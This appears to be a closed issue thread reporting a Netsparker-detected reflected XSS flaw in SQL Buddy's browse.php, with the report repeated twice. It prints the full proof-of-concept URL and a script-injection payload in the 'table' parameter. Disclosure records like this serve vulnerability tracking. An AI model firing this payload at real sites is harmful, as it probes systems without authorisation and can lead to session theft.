Closed omarkurt closed 8 years ago
Netsparker Found XSS in browse.php
Url: http://example.com/sqlbuddy/browse.php?ajaxRequest=89&requestKey=be91e6d9714bb1c4&db=information_schema&table='"--></style></scRipt><scRipt>alert(0x000290)</scRipt> Parameter Name: table Parameter Type: Querystring Attack Pattern '"--></style></scRipt><scRipt>alert(0x000290)</scRipt>
Reference: https://www.netsparker.com/crosssite-scripting-xss/ https://www.netsparker.com/netsparker-advisories/
Closing this as we are planning a ground up rewrite for v2.0.
Netsparker Found XSS in browse.php
Url: http://example.com/sqlbuddy/browse.php?ajaxRequest=89&requestKey=be91e6d9714bb1c4&db=information_schema&table='"--></style></scRipt><scRipt>alert(0x000290)</scRipt> Parameter Name: table
Parameter Type: Querystring
Attack Pattern '"--></style></scRipt><scRipt>alert(0x000290)</scRipt>
Reference: https://www.netsparker.com/crosssite-scripting-xss/ https://www.netsparker.com/netsparker-advisories/